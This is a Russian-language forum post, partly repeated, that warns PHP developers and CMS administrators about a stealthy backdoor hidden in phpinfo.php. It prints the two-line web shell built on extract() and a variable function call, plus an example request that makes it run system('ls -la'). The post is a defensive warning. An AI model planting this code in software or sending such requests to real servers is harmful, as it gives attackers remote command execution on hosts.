И так... Думаю, эта статейка поможет еще кому-нибудь, особенно php кодерам. Да и вообще людям, администрирующим хостинг с CMS'ом каким-нить, типа joomla и т.д.
Выявлен заслуживающий внимания PHP-бэкдор, активация которого производится без видимого обращения к таким функциям, как "eval", "exec", "system", "assert" и "preg_replace". Вместо явного указания eval и других сразу вызывающих подозрение функций, при установке бэкдора в файле phpinfo.php появляется несколько на первый взгляд неопасных строк:
При более вдумчивом просмотре становится ясно, что при помощи функции extract осуществляется создание переменных на основании данных, переданных в составе запроса GET или POST. Конструкция $ctime($atime) по сути является вызовом функции, имя которой хранится в переменной $ctime. Сформировав запрос "/phpinfo.php?ctime=system&atime=ls -la" получим вызов функции system() с аргументом "ls -la".
(c)источник
З.Ы. просьба модеров, прилепить тему в соответствующий раздел форума. Думаю, или раздел программирование, или компьютерная безопасность. Так же, думаю стОит обратить внимание админа на эту тему, пусть дырки латает ))
Выявлен заслуживающий внимания PHP-бэкдор, активация которого производится без видимого обращения к таким функциям, как "eval", "exec", "system", "assert" и "preg_replace". Вместо явного указания eval и других сразу вызывающих подозрение функций, при установке бэкдора в файле phpinfo.php появляется несколько на первый взгляд неопасных строк:
Код:
@extract ($_REQUEST);
@die ($ctime($atime));
(c)источник
З.Ы. просьба модеров, прилепить тему в соответствующий раздел форума. Думаю, или раздел программирование, или компьютерная безопасность. Так же, думаю стОит обратить внимание админа на эту тему, пусть дырки латает ))